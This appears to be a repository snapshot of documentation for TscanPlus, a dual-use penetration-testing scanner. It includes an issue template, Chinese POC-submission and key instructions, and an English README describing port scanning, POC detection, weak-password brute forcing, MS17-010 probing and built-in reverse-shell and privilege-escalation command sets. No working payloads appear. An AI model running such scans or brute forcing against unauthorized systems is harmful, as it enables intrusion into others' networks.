chore: import TideSec/TscanPlus main docs snapshot

History-free lightweight snapshot (docs/skill only).
Large binaries and media published via Gitea Releases.
This commit is contained in:
2026-07-24 05:39:35 +00:00
commit 6be840d9fa
12 changed files with 5132 additions and 0 deletions
+37
View File
@@ -0,0 +1,37 @@
---
name: Bug 反馈
about: 欢迎反馈意见和建议
title: ''
labels: ''
assignees: ''
---
### 📝 问题描述
清晰简洁地描述您遇到的问题(例如:扫描结果错误、模块崩溃、功能异常等)
提issue前,可先查阅 [**FAQ**](https://github.com/TideSec/TscanPlus?tab=readme-ov-file#FAQ) 或 [**程序执行闪退相关问题合集**](https://github.com/TideSec/TscanPlus/issues/383) 看能否解决您的问题。
### 🕹 复现步骤
请按照实际操作步骤填写,确保可复现(示例格式):
1. **使用环境**
- 目标系统:`Windows 10企业版`
- 无影版本:`v2.7.0`
- 网络环境:`内网扫描` / `公网目标` / `代理环境(需说明代理配置)`
2. **功能配置**
- 功能模块:`端口扫描`
- 防护设备:目标是否存在 WAF/IDS/防火墙
- 配置截图:`资产数量、端口选择、线程数、超时时间等,尽量附截图`
3. **异常描述**
- 执行扫描后马上闪退或一段时间后闪退,大约多久,CPU和内存占用情况如何
- 出现频率:每次都能复现还是偶尔会出现,概率大约多少?该问题是否在旧版本正常?
- 观察日志文件`TscanPlus-Result.txt`是否有日志信息,提供关键字段截图
### ⚠️ 注意事项
1. 为快速定位问题,**请务必提供完整的截图描述和日志文件**
2. 涉及敏感信息(如目标地址、业务数据)请通过私信或脱敏处理
3. 临时方案:若有临时解决方法(如替换参数、修改配置),请在此说明
+75
View File
@@ -0,0 +1,75 @@
POC提交及无影Key获取说明
### 一、提交平台中已有漏洞对应Poc
    1、在http://sso.tidesec.com注册并登录,从导航页访问"潮声漏洞检测平台",或使用http://poc.tidesec.com直接访问。
<div align=center><img src=images/image-20240716101322403.png width=80% ></div>
    2、点击"提交POC",选择平台已提供的漏洞,点击➕号,进入表单页。
<div align=center><img src=images/image-20240716094041990.png width=80% ></div>
    3、表单页中需要填写POC名称、POC详情。POC兼容Xray Poc 1.0版和Fscan的Poc格式,不兼容Xray Poc 2.0或XPoc格式。自行编写Poc时,可借助工具:https://github.com/phith0n/xray-poc-generation,每个POC均需个人搭建环境验证通过后再提交。
<div align=center><img src=images/image-20240716094732909.png width=80% ></div>
    4、确保填写无误,点击确定,审核结果在个人中心POC列表中查看。如未审核通过,可在个人中心进行编辑,重新提交审核。
<div align=center><img src=images/image-20240716095045016.png width=80% ></div>
    5、审核通过的POC,在注册码列表里,可以看到对应的注册码。
<div align=center><img src=images/image-20240716095224200.png width=80% ></div>
### 二、提交新漏洞及对应Poc
    1、提交平台中不存在漏洞信息的POC,需自行先提交漏洞信息【头像-漏洞列表-点击添加】,漏洞通过审核后,方可继续提交POC信息。
<div align=center><img src=images/image-20240716100251628.png width=80% ></div>
    2、第一步的漏洞通过审核后,点击菜单"提交POC",查找该漏洞,点击➕号,进入表单页。
<div align=center><img src=images/image-20240716100438523.png width=80% ></div>
    3、后续操作与上面的"提交平台中已有漏洞对应Poc"相同。
### 三、知识星球用户获取无影VipKey方法
    1、加入知识星球"剑影安全实验室"三天后,用户可登录sso【http://sso.tidesec.com】平台开通VIP认证:进入个人中心-开通/续费-输入星球内星球编号和星球昵称-提交。
<div align=center><img src=images/image-20240716102947501.png width=80% ></div>
    获取星球编号及星球昵称:必须安装【知识星球】手机端,打开手机端知识星球,点击右上⻆三条横线(小程序没有),出现下图右侧界面后,查看图中头像下方昵称为星球昵称,成员编号为星球编号。
<div align=center><img src=images/image-20240716101836620.png width=80% ></div>
    2、用户通过SSO审核成为VIP用户后,退出并重新登录SSO,访问"潮声漏洞检测平台"-个人中心-注册码列表,系统自动生成三个初始注册码,可直接使用。
<div align=center><img src=images/image-20240716102052013.png width=80% ></div>
<div align=center><img src=images/image-20240716103216285.png width=80% ></div>
### 四、无影VipKey使用注意事项
    1、普通用户提交提交3个Poc后可获得3个VipKey,之后每多提交一个Poc可多获得一个VipKey。
    2、【知识星球】用户可直接获得3个注册码,每隔三个月可重置一次key,新key的有效期为1年。
    3、每个VipKey的有效期为1年(Poc提交审核通过后开始计算),一个VipKey只能用于一个客户端。
    4、获得VipKey后,复制到无影(TscanPlus v2.2及以后版本)中,**联网状态**,点击校验即可激活。
<div align=center><img src=images/image-20240716095402631.png width=80% ></div>
+1113
View File
File diff suppressed because it is too large Load Diff
+986
View File
@@ -0,0 +1,986 @@
<div align=center><img src=images/TscanPlus.png width=50% ></div>
## TscanPlus
**TscanPlus** is a comprehensive network security detection and operations tool designed for rapid asset discovery, identification, and assessment. It helps build a foundational asset information database and assists security teams or operations personnel in efficiently scouting and scanning assets, identifying vulnerabilities and attack surfaces.
**【Main Features】**: Port scanning, service identification, URL fingerprinting, POC validation, weak password brute force, directory scanning, UrlFinder, domain detection, network reconnaissance, project management, etc.
**【Auxiliary Features】**: Encoding/decoding, encryption/decryption, CSRF exploitation, reverse shell, antivirus detection, privilege escalation tools, common commands, dictionary generation, Java encoding, asset sorting, host collision, 40x Bypass, JWT cracking, IP geolocation lookup, etc.
https://github.com/TideSec/TscanPlus/assets/46297163/0f8cff21-6c33-4da3-bb6d-5f33d032a23e
<video controls="controls" loop="loop" autoplay="autoplay">
<source src="images/TscanPlus-Introduce.mp4" type="video/mp4">
</video>
In 2019, I developed a fingerprint recognition tool in Python — [TideFinger](https://github.com/TideSec/TideFinger), and also launched a free online fingerprint detection platform — Tide Finger [finger.tidesec.com](http://finger.tidesec.com). It has since accumulated over 30,000 users and performs around 2,000 fingerprint recognitions daily. In early 2023, I developed a Go version of [TideFinger_Go](https://github.com/TideSec/TideFinger_Go), gaining valuable experience in web and service fingerprint recognition.
Later, our teams senior member developed **Tscan** based on Fscan, primarily for internal POC collection, organization, and forming an automated weapon library. It can accurately detect POCs based on fingerprint recognition results. **无影 (TscanPlus)** builds upon fingerprints and POCs, expanding with multiple automation features, significantly enhancing security operations and detection efficiency, and making it more convenient for cybersecurity professionals.
**【Key Features】**
1. **Fingerprint Database**: Built-in with over 52,000 fingerprint entries, capable of fingerprinting 10,000 web systems in just 8-10 minutes. It offers high efficiency and comprehensive fingerprint coverage.
2. **Automatic CMS & POC Association**: The tool automatically tags over 130 common CMS and frameworks used by red teams in fingerprint detection. It includes a large collection of high-quality POCs and supports external POC tools like Nuclei, Afrog, and Xray. It enables fingerprint and POC integration, automatically associating POCs with fingerprint results and providing direct access to POC packet details.
3. **Integrated Functionality**: When performing IP port scanning or URL scanning, it integrates POC detection, password cracking, and directory scanning. When a matching service or product is detected, it automatically triggers password cracking or POC detection.
4. **Weak Password Cracking**: Built-in weak password cracking for 34 common services, helping administrators identify weak passwords within internal networks. The tool includes optimized and simplified username and password dictionaries for each service. Supported services include SSH, RDP, SMB, MYSQL, SQLServer, Oracle, MongoDB, Redis, PostgreSQL, MemCached, Elasticsearch, FTP, Telnet, WinRM, VNC, SVN, Tomcat, WebLogic, JBoss, Zookeeper, Socks5, SNMP, WMI, LDAP, LDAPS, SMTP, POP3, IMAP, SMTP_SSL, IMAP_SSL, POP3_SSL, RouterOS, WebBasicAuth, Webdav, CobaltStrike, etc.
5. **Encoding, Hashing, Encryption, and More**: Supports 36 types of operations, including 8 encoding/decoding methods, 13 hashing algorithms, 9 encryption/decryption algorithms, 3 national encryption algorithms (SM), and 9 data formatting/conversion functions. This includes AES, RSA, SM2, SM4, DES, 3DES, Xor, RC4, Rabbit, Base64, Base32, URL encoding, ASCII, various base conversions, string-to-base conversions, HTML, Unicode, MD5, HMAC, SM3, SHA1, SHA2, SHA3, NTLM, JSON formatting and compression, XML formatting and compression, IP address-integer conversion, Unix timestamp conversion, text deduplication, case conversion, random string generation, string reversal, JWT parsing, weak password decryption, and more.
6. **Directory Enumeration**: Default scanning uses the HEAD method and supports customization of concurrency, timeout, filtering, and dictionary settings. Includes DirSearch dictionary, with options to import custom dictionaries or use the built-in fuzz tool to generate them.
7. **Shell Commands**: Includes 85 reverse shell commands, 26 Win internal commands (credential gathering, privilege escalation, lateral movement), 18 Linux internal commands, 31 download commands, 21 MSF generation commands, and CS evasion shell commands. The tool can automatically generate code based on shell type, OS type, and listener type.
8. **Flexible Proxy Settings**: Supports one-click global proxy configuration or enabling proxy settings for individual modules. It supports both HTTP(S) and SOCKS5 proxies, with authentication support.
9. **Fast Subdomain Enumeration**: Allows fast subdomain detection, with the ability to link to other functionalities. Supports multiple network space discovery platforms via API key integration, with one-click query and deduplication.
10. **Integrated Tools**: Includes asset sorting, JsFinder, Host collision, JWT key cracking, IP lookup, Windows privilege escalation tools, antivirus queries, Shiro decryption, and more.
**【Disclaimer & License】**
1. This tool is prohibited from being used for unauthorized commercial purposes, and **is not allowed to be used for unauthorized commercial purposes after any modification**.
2. This tool is intended solely for legitimate and authorized corporate security initiatives. When using this tool for testing, you must **ensure that the activity complies with local laws and regulations**, and that you have **obtained sufficient authorization**.
3. If you engage in any **illegal activities** while using this tool, you will bear full responsibility for the consequences. We will not be liable for any legal or associated liabilities.
4. Before installing and using this tool, please **carefully read and fully understand the terms** and accept all provisions of this agreement. Otherwise, do not use this tool. Your use of this tool, or any other express or implied action indicating acceptance of this agreement, will be considered as your acknowledgment and agreement to the terms of this agreement.
* ## Table of Contents
- [Changelog](#changelog)
- [Software Usage](#Software Usage)
- [Software Download and Updates](#1-software-download-and-updates)
- [Welcome](#2-welcome)
- [Project Management](#3-project-management)
- [Port Scanning](#4-port-scanning)
- [URL Detection](#5-url-detection)
- [Domain Enumeration](#6-domain-enumeration)
- [POC Detection](#7-poc-detection)
- [Password Cracking](#8-password-cracking)
- [Space Mapping](#9-space-mapping)
- [Encoding/Decoding](#10-encodingdecoding)
- Light Weapon Library
- [Directory Enumeration](#directory-enumeration)
- [UrlFinder](#urlfinder)
- [Host Collision](#host-collision)
- [40x Bypass](#40x-bypass)
- [JWT Decoding and Cracking](#jwt-decoding-and-cracking)
- [IP Geolocation Lookup](#ip-geolocation-lookup)
- [Proxy Pool Function](#proxy-pool-function)
- Red Team Commands
- [Red Team Commands](#red-team-commands)
- [Download Commands](#download-commands)
- [Web Shell](#web-shell)
- [Java Encoding](#java-encoding)
- [Reverse Shell](#reverse-shell)
- [CS Session](#cs-session)
- Auxiliary Tools
- [Asset Sorting](#asset-sorting)
- [Password Generation](#password-generation)
- [Password Lookup](#password-lookup)
- [Privilege Escalation Assistance](#privilege-escalation-assistance)
- [Antivirus Lookup](#antivirus-lookup)
- Other Features
- [Export Functionality](#export-functionality)
- [Database Management](#database-management)
- [Configuration Management](#configuration-management)
- [Theme Settings](#theme-settings)
- [Log Functionality](#log-functionality)
- [Software Download](#software-download)
- [Acknowledgements](#acknowledgements)
- [FAQ](#faq)
### Changelog
Thanks to all the experts for their valuable suggestions and bug reports!
**v2.6.5** 【2024.12.18】 Added proxy pool management, support for language switching, multiple network interface selection, and fixed/enhanced various features.
**v2.6** 【2024.10.18】 Added auto-update feature, password cracking result verification, and increased built-in POC count to over 2300.
**v2.5** 【2024.09.15】 Refactored the port scanning module, improving efficiency by 2-3 times, and addressed high resource usage in POC detection.
**v2.4** 【2024.09.01】 Optimized false positive detection algorithms, added webshell generation, fixed password cracking detection issues and crashes.
**v2.3** 【2024.08.12】 Framework upgrade, added log functionality, optimized resource usage, and improved space detection algorithms.
**v2.2** 【2024.07.22】 Added 1300+ POCs, Key authentication, Host collision, 40x Bypass detection, JWT cracking and encryption/decryption, IP geolocation lookup, etc.
**v2.1** 【2024.07.01】 Added custom passive fingerprinting, program interruption recovery, custom header information, and export Excel with high-risk asset red-marking.
**v2.0** 【2024.06.18】 Added encoding/decoding functionality, supporting 36 types of encoding, encryption, decryption, hashing, and custom Nuclei POC matching.
**v1.9** 【2024.05.28】 Added 8327 fingerprint detection rules, totaling 51,873, remote download of non-core configuration files, and added active fingerprint detection.
**v1.8** 【2024.05.01】 Improved password cracking functionality with multi-threading optimization, frontend responsiveness optimization for large assets, and project vulnerability detail display.
**v1.7** 【2024.04.16】 Added asset sorting feature, POC detection now supports direct integration with Nuclei, Xray, and Afrog, and custom POC functionality.
**v1.6** 【2024.03.25】 Added project management flow, enhanced module interactions, and enabled CRUD operations for all features and data via the database.
**v1.5** 【2024.03.01】 Added one-click API key availability check, updated AV detection database, and supported adding custom red team commands.
**v1.4** 【2024.02.18】 Added network space detection module, built-in 9 common space detection APIs, and added recursive directory enumeration and filtering features.
**v1.3** 【2024.01.22】 Added password generation feature, built-in three generation modes, asset weak password query function with 11,000+ records.
**v1.2** 【2024.01.10】 Added subdomain enumeration and interface query functions, optimized fingerprint detection for non-web services, and added Excel export feature.
**v1.1** 【2023.12.27】 Added Java command encoding, refactored directory enumeration for 10x efficiency improvement, and synchronized IP scanning and fingerprint detection.
**v1.0** 【2023.12.21】 Implemented local/global proxy functionality, supporting HTTP(s)/SOCKS5, official release.
**v0.9** 【2023.12.19】 Implemented task linkage between features and right-click menu interactions.
**v0.8** 【2023.12.15】 Added version update check, validity check, and configuration file read/write support.
**v0.7** 【2023.12.12】 Completed auxiliary features like antivirus query and privilege escalation assistance.
**v0.6** 【2023.12.10】 Completed reverse shell, CS session, download commands, and red team commands.
**v0.5** 【2023.12.08】 Implemented directory enumeration and fuzzing mode.
**v0.4** 【2023.11.29】 Completed weak password cracking module.
**v0.3** 【2023.11.18】 Implemented POC detection and POC fingerprint matching functionality.
**v0.2** 【2023.11.01】 Implemented URL scanning and web fingerprinting features.
**v0.1** 【2023.10.23】 Implemented IP and port scanning, service identification functionality.
**v0.0** 【2023.10.10】 Selected TscanPlus architecture and initial feature planning.
### Software Usage
#### 1. Download and Update
- **GitHub Download**: [TscanPlus Releases](https://github.com/TideSec/TscanPlus/releases)
- **Knowledge Planet**: 【Sword Shadow Security Lab】 (See QR code below for **more and updated versions**)
The software is developed using Wails and supports Windows, Mac, Linux, and other systems. It can be used directly after downloading.
Due to some security settings in macOS, individual issues such as errors or crashes may occur. Please refer to the FAQ at the bottom for more details.
For Windows users, the program relies on [Microsoft WebView2](https://developer.microsoft.com/en-us/microsoft-edge/webview2/). Windows 11 and Windows Server 2012 installations will install it by default, but some older machines (e.g., Windows Server 2008) may not have it. If WebView2 is missing, the program will guide you to download and install it. Additionally, the Windows version uses UPX compression, so antivirus software might flag it as a virus. Please check your system.
#### 2. Welcome
Upon running the software, please carefully read and fully understand the **"Disclaimer & Usage License"**. Afterward, check the **"I agree to all terms"** box on the Welcome page to proceed and use the software.
![image-20241225162240546](images/image-20241225162240546.png)
**【Key Authentication Feature】**
To make the "Shadowless (TscanPlus)" Poc detection more comprehensive and accurate, and to create a healthy ecosystem, a key authentication feature has been added.
After key authentication, users can access all the built-in POCs. Unauthenticated users are limited to only 420 POCs, while all other features remain fully functional.
![image-20241225162256822](images/image-20241225162256822.png)
Upon key authentication, users will have access to all 1300+ built-in POCs.
![image-20241225162351020](images/image-20241225162351020.png)
**Three Ways to Obtain a Key:**
1. **Submit 3 POCs on the Poc platform**: After submitting three POCs, you will receive three keys. For each additional POC submitted, you will receive one more key.
2. **Submit a valid bug in the discussion group or GitHub Issues**: Once the bug is fixed, you will receive one key.
3. **Join the Knowledge Planet**: You will receive three keys directly upon joining, and these can be reset every three months. Additionally, each POC submission after that will earn you one more key.
**Key Authentication Details:**
1. **Network Requirement**: The first time you authenticate your key, you will need an internet connection (to connect to poc.tidesec.com) for verification. Once successfully authenticated, you will not need to reconnect for subsequent verifications.
2. **Hardware Binding**: Each key can only be used with one client, typically linked to hardware serial numbers like network card IDs. Therefore, changing hardware may cause the authentication to fail.
3. **Purpose of Key Authentication**: The key system is designed to support POC usage and collection, creating a beneficial cycle—“What we take from the community, we give back to the community.” We encourage users who have POCs to contribute them.
**For detailed instructions on submitting, obtaining, and using the key, please visit**: [http://poc.tidesec.com/index/explain.html](http://poc.tidesec.com/index/explain.html)
#### 3、Project Management
The project management feature integrates various functions into a workflow. Users can design project tasks based on their usage scenarios, seamlessly incorporating "Asset Mapping," "Subdomain Enumeration," "IP/Port Scanning," "Password Cracking," "POC Detection," "URL Scanning," "Directory Scanning," "UrlFinder," and other functionalities. The results of project execution will be stored in the corresponding project database, facilitating subsequent queries and usage.
**【Task Configuration】**
After adding target assets and configuring task parameters, TscanPlus will execute the corresponding operations in the background and display the results in the relevant function tab.
1. **Sequential Execution of Tasks**:
- "Asset Mapping" → "Subdomain Enumeration" → "IP/Port Scanning" → "Password Cracking" → "POC Detection" → "URL Scanning" → "Directory Scanning" → "UrlFinder".
- By default, assets discovered in previous steps will be used as input for subsequent tasks.
2. **Asset Mapping**:
- If assets discovered by the asset mapping process may not belong to your target range, enable the “Scan and POC Detection for Mapped Assets” option. However, be cautious, as space mapping might involve assets beyond your authorized scope.
3. **URL Detection**:
- Enabling the URL scanning function will trigger URL fingerprint detection for all web applications discovered from domain names, IPs, URLs, and space mapping.
4. **POC Matching**:
- If you do not select "POC Fingerprint Matching," all detected assets will be tested against all POCs.
5. **Port and Service Cracking**:
- Enabling "Crack All Ports and Services" will initiate cracking for all matched ports and services. If not enabled, only 8 common services will be cracked.
6. **Directory Scanning**:
- When using the directory scanning feature:
- If you select **"URL List Only"**, only the URLs in the list will undergo directory scanning.
- If you select **"All Discovered URLs"**, all URLs discovered through IP, domain, and other tasks will undergo directory scanning. Be aware that if there are many URLs, this may slow down the process.
![image-20241225162433149](images/image-20241225162433149.png)
**【Project Management】**
In the project management section, users can view an intuitive project overview, including details such as the total number of projects, URL assets, IP assets, total vulnerabilities, and sensitive information. Users can also perform operations such as editing, re-executing, stopping, or deleting any project.
![image-20241225162448784](images/image-20241225162448784.png)
**【Results Display】**
All scan results will be displayed in the corresponding functional tab for easy access and review.
<div align=center><img src=images/image-20240327160956342.png width=80% ></div>
#### 4. Port Scanning
This function allows for live host detection, port scanning, service identification, and banner grabbing. It can recognize over 100 types of services and protocols.
**【Task Configuration】**
- **IP Format**:
- The target IPs can be separated by line breaks and support the following formats:
- `192.168.1.1`
- `192.168.1.1/24` (CIDR notation for network range)
- `192.168.1.1-255` (range from `192.168.1.1` to `192.168.1.255`)
- `192.168.1.1,192.168.1.3` (comma-separated list)
- **IP Exclusion**:
- You can exclude specific IPs by adding `!` before the IP address or network range:
- `!192.168.1.1/26` (excludes this IP range)
- **Task Configuration Options**:
- **Port Strategy**: Choose the port range or specific ports to scan.
- **Ping Scan**: Enable or disable ping (ICMP) scanning to check if the host is up.
- **Password Cracking Synchronization**: Optionally synchronize the password cracking task.
- **POC Detection Synchronization**: Optionally synchronize POC (Proof of Concept) vulnerability detection.
- **Proxy**: Enable proxy usage during the scan if needed.
Once the configuration is done, you can start the scan to gather port and service information.
**【Scan Results】**
The scan results are displayed as follows, showing service-related protocols, banners, status codes, titles, etc. If a product that may have a vulnerability is detected in the banner, it will be highlighted in red.
By selecting a specific row, you can right-click to perform individual POC testing, weak password testing, directory enumeration, etc. You can also save data individually or save all results.
![image-20241225162609861](images/image-20241225162609861.png)
To facilitate use in certain scenarios, servers with open port 445 in internal networks will automatically undergo MS17010 vulnerability exploration. This process minimizes the impact on the server while attempting to detect potential vulnerabilities.
<div align=center><img src=images/image-20240617181901258.png width=80% ></div>
**【Feature Integration】**
Within any functionality, you can link it with other features. For example, when performing an IP scan, you can simultaneously enable password cracking and POC detection. If a matching port service is found, password cracking will automatically be initiated; if a matching fingerprint is found, POC detection will be triggered. Simply check these two options, and the results will be displayed in the relevant module.
<div align=center><img src=images/image-20231221144525144.png width=80% ></div>
https://github.com/TideSec/TscanPlus/assets/46297163/2a88ced9-1612-4015-aa5e-0bb0e243525a
<video controls="controls" loop="loop" autoplay="autoplay">
<source src="images/TscanPlus.mp4" type="video/mp4">
</video>
**【Advanced Configuration】**
In the advanced configuration, you can set the proxy address. When global proxy is enabled, all functions will be routed through the proxy. Both HTTP(S) and SOCKS5 proxies are supported, and authentication is also available. You can also set global cookies or User-Agent (UA), among other settings.
Proxy formats:
- **HTTP Proxy Format**: `http://10.10.10.10:8081` or `http://user:pass@10.10.10.10:8081`
- **HTTPS Proxy Format**: `https://10.10.10.10:8081` or `https://user:pass@10.10.10.10:8081`
- **SOCKS5 Proxy Format**: `socks5://10.10.10.10:8081` or `socks5://user:pass@10.10.10.10:8081`
<div align=center><img src=images/image-20231221133246236.png width=80% ></div>
#### 5. URL Detection
TscanPlus currently integrates more than 26,000 fingerprints. After multiple optimizations, it has significantly improved the concurrency efficiency of asset discovery. It only takes 8-10 minutes to perform fingerprint recognition on 10,000 web systems. In terms of efficiency and fingerprint coverage, it is considered to be one of the highest available tools.
**【Task Configuration】**
URL detection is mainly used for bulk detection of web addresses. The input format is one URL per line, with the prefix being `http` or `https`:
```
http://www.abc.com
http://192.168.1.1:8080
https://www.abc.com:8443
```
Similarly, you can choose the number of threads, whether to enable POC detection, whether to enable the proxy, and once configured, you can start the scan.
**【Custom Fingerprints】**
Since version v2.1, TscanPlus supports custom fingerprints, including both passive and active fingerprints.
When active fingerprint detection is enabled, you can edit the `FingerDir.yaml` file in the configuration directory to add active fingerprint rules. Each added active fingerprint will send an additional HTTP request during fingerprint recognition. If many active fingerprints are added, it can affect the efficiency of fingerprint recognition, so it is recommended to add them with caution.
<div align=center><img src=images/image-20240701110500509.png width=80% ></div>
In the configuration directory, there is a `Finger.json` file, which serves as the rule base for passive fingerprint recognition. The fingerprint library uses the Wappalyzer format. To make custom fingerprints more practical, two additional keys, `headerstr` and `titlestr`, are added. These allow for matching header and title strings. If a custom fingerprint overlaps with a built-in fingerprint, the custom fingerprint will take priority. After adding custom fingerprints, be sure to test them before using them in production.
<div align=center><img src=images/image-20240701110842309.png width=80% ></div>
**【Scan Results】**
The scan results are displayed as follows, showing the web site's title, banner, status code, middleware, WAF detection, etc. If a potentially vulnerable product is identified in the banner, it will be highlighted in red.
By selecting a specific line, the right-click menu allows you to run POC testing, directory enumeration, etc., for that particular address. You can also save individual entries or save all results.
<div align=center><img src=images/image-20231221133907830.png width=80% ></div>
#### 6. Domain Enumeration
TscanPlus integrates multiple features for domain enumeration. It supports dictionary-based enumeration and querying via multiple free interfaces.
**【Task Configuration】**
Domain enumeration is network-dependent, so when dealing with multiple domains, it processes them one by one. By default, it uses a dictionary of 10,000 entries and 50 threads. In optimal network conditions, it takes about 12 seconds.
Enter one domain per line without the `http` prefix, such as:
```
tidesec.com
tidesec.com.cn
```
You can choose the number of threads (recommended range: 50-100), whether to enable POC detection, and whether to enable fingerprint recognition. Once configured, you can start the domain enumeration task.
**【Scan Results】**
The scan results are displayed as follows, showing subdomains, resolved IPs, open ports, website titles, domain sources, etc. If a potentially vulnerable product is identified in the banner, it will be highlighted in red.
By selecting a specific line or multiple lines, the right-click menu allows you to run POC testing, directory enumeration, etc., for that particular address. You can also save individual entries or save all results.
<div align=center><img src=images/image-20240110164454188.png width=80% ></div>
#### 7. POC Detection
TscanPlus has built-in POCs and categorizes them into levels. Level 1 POCs are the most common and frequently used, Level 2 POCs are more general, and Level 3 POCs are less common.
**【Task Configuration】**
URLs can be imported from a txt file or entered manually. The URLs must have the HTTP/HTTPS prefix.
One important option is "POC Fingerprint Matching." This option is enabled by default. When enabled, POCs are matched based on fingerprint information. If no match is found, no further testing is done. When disabled, all selected POCs will be tested regardless of the fingerprint match.
You can specify external POC files or POC folders by entering the absolute path, such as `C:\POC`. However, imported POCs will not be fingerprint-matched, and the system will run all imported POCs by default.
External POCs support Xray or similar formats. For details on writing POCs, refer to:
- [Xray POC documentation](https://poc.xray.cool/)
- [Xray POC generation guide](https://phith0n.github.io/xray-poc-generation/)
**【Custom POC】**
POC detection can directly call external POC tools like Nuclei, Xray, Afrog, etc., and allows for custom POCs for each tool.
When the "POC Fingerprint Matching" feature is enabled, the program will perform a fuzzy match of external POCs based on the target fingerprint, followed by POC detection. This significantly reduces the number of POC packets sent and shortens the detection time.
<div align=center><img src=images/image-20240417162352536.png width=80% ></div>
Nuclei POCs are by default downloaded to the `nuclei-templates` directory in the user folder. The program will automatically recognize this directory, so you do not need to specify the Nuclei POCs when using the "POC Fingerprint Matching" feature in Nuclei.
However, Afrog POCs are embedded in the program by default. If you want to use the "POC Fingerprint Matching" feature in Afrog, you need to download the POC files from [Afrog GitHub Repository](https://github.com/zan8in/afrog/tree/main/pocs/afrog-pocs) and specify the directory where the POCs are stored within the program.
The fingerprint matching POC rules have been optimized and improved to minimize the number of POC detections while preventing false negatives. A POC detection level filter has been added to effectively avoid the large amount of info-level messages generated during default scanning by Nuclei and Afrog tools.
<div align=center><img src=images/image-20240617182603002.png width=80% ></div>
The custom POC feature of TscanPlus (Wuying) is also well-developed and is compatible with both Xray POC 1.0 and Fscan POC formats.
When writing custom POCs, you can use the following tool for testing: [Xray POC Generation Tool](https://github.com/phith0n/xray-poc-generation).
**【Scan Results】**
The scan results will show the vulnerable sites, POC names, Banners, status codes, titles, and more. After selecting a row, you can view the Request and Response packets.
At the bottom, it will display the number of live targets, successful POC detections, the status of the detection queue, and the time spent.
<div align=center><img src=images/image-20231221135024558.png width=80% ></div>
#### **8. Password Cracking**
TscanPlus has built-in support for weak password cracking for 34 common services. This allows administrators to check for weak passwords in internal networks. To improve detection efficiency, TscanPlus selects and streamlines the username and password dictionaries for each service. The supported services include: SSH, RDP, SMB, MySQL, SQL Server, Oracle, MongoDB, Redis, PostgreSQL, MemCached, Elasticsearch, FTP, Telnet, WinRM, VNC, SVN, Tomcat, WebLogic, JBoss, Zookeeper, Socks5, SNMP, WMI, LDAP, LDAPS, SMTP, POP3, IMAP, SMTP_SSL, IMAP_SSL, POP3_SSL, RouterOS, WebBasicAuth, WebDAV, CobaltStrike, and others.
**【Task Configuration】**
Select the service to be cracked from the left panel, then input the target address. When configuring the task on the right, you can choose to use the built-in dictionaries or import your own, enable fingerprint recognition, configure Oracle listener settings, and execute commands, among other options.
<div align=center><img src=images/image-20240417162518632.png width=80% ></div>
**【Scan Results】**
The scan results will show the services with weak passwords, accounts, passwords, banners, executed commands, and time taken.
At the bottom, the number of live targets, successful crack count, detection queue status, and time spent will be displayed. The cracking log will also be shown in real-time.
<div align=center><img src=images/image-20231221140432486.png width=80% ></div>
In TscanPlus v2.6 and later versions, a new feature for password cracking result connection validation has been added. This allows for connection checks on the cracked weak passwords and supports over a dozen common protocols.
<div align=center><img src=images/mysql.png width=80% ></div>
<div align=center><img src=images/ssh.png width=80% ></div>
#### **9. Space Mapping**
To make information collection quicker and more convenient, TscanPlus integrates multiple network space mapping interfaces, including nine mainstream space exploration APIs: **Hunter** (from Eagle Map), Fofa, Shodan, 360 Quake, Zoomeye (Zhong Kui's Eye), Censys, ThreatBook (from WeiStep Online), BinaryEdge, VirusTotal, etc. These APIs allow searches based on domain names, IP addresses, ports, applications, services, and more. The results from these network space exploration APIs will be deduplicated and integrated.
**【Task Configuration】**
First, configure the key information. If you don't have a key, you can click the "API Application" link to apply for one. Afterward, click "Enable" to use the corresponding API.
On the main interface, you can select fields like domain name, IP address, port, application, service, body, certificate, ICON, etc., and input search criteria. TscanPlus will deduplicate and integrate all results.
For the Fofa API, a custom API address feature has been added. When setting the Fofa API Key, if you need to use a custom API address, the format should be `email:key||url`, where the double vertical bars (`||`) separate the key and the URL. For example: `9*****@qq.com:3f21a408*********6e3fa8078||http://fofaapi.com`. After adding the key, you can perform a key validity check to test if data can be fetched.
<div align=center><img src=images/image-20240327165140791.png width=80% ></div>
**【Query Results】**
The query results are displayed as follows, showing information such as URL, IP, domain name, port, protocol, title, fingerprint, application, Whois, ICP filing, ISP, OS, region, last updated time, and the source of the API.
You can select one or more rows, right-click the menu to perform individual POC tests, directory enumeration, port scanning, etc. You can also save data either individually or all at once.
<div align=center><img src=images/image-20240327164931978.png width=80% ></div>
Custom syntax is supported; however, since each space mapping engine uses different syntax, custom syntax is generally not interchangeable.
<div align=center><img src=images/image-20241018143704418.png width=80% ></div>
#### 10. Encoding and Decoding
The encoding and decoding module supports a total of 36 types, including encoding and decoding, hash calculation, encryption and decryption, national cryptography algorithms, data formatting, and other transformations. Among these, there are 8 types for encoding and decoding, 13 types for hash calculation, 9 types for encryption and decryption, 3 types for national cryptography algorithms, 9 types for data formatting, and 2 types for other transformations.
**【Task Configuration】**
1. Simply select the corresponding encoding option from the left sidebar of the "Encoding and Decoding" function page, and it will be added to the right-side tab.
2. Each tab supports multiple encodings stacked together and allows encoding order adjustments. The output of the previous encoding will serve as the input for the next encoding.
3. For each encoding, you can choose whether to enable encryption or decryption, and configure input and output formats. Common formats like RAW, Hex, and base64 are supported.
4. "Wuying" supports multiple tab switching. You can configure multiple tabs according to your needs to compare results.
5. The system can remember the current encoding configuration, so next time you run the software, you can directly use the previous configuration.
<div align=center><img src=images/image-20240617175854995.png width=80% ></div>
**【Output Results】**
**1. Encoding and Decoding**: Base64, Base32, URL encoding/decoding, ASCII, various base conversions, string and base conversions, HTML encoding/decoding, Unicode encoding/decoding, one-click encoding/decoding, etc.
<div align=center><img src=images/image-20240617180132022.png width=80% ></div>
The one-click encoding/decoding feature allows you to encode and decode the input characters and output the results.
<div align=center><img src=images/image-20240617180214330.png width=80% ></div>
**2. Hash Calculation**: MD5, HmacMD5, SM3, HmacSM3, SHA1, HmacSHA1, SHA2-224, SHA2-256, SHA2-384, SHA2-512, HmacSHA2, SHA3-224, SHA3-256, SHA3-384, SHA3-512, HmacSHA3, NTLM, HmacNTLM, one-click hash, etc.
<div align=center><img src=images/image-20240617180257634.png width=80% ></div>
The one-click hash feature calculates all hash values for the input characters and outputs the results.
<div align=center><img src=images/image-20240617180402999.png width=80% ></div>
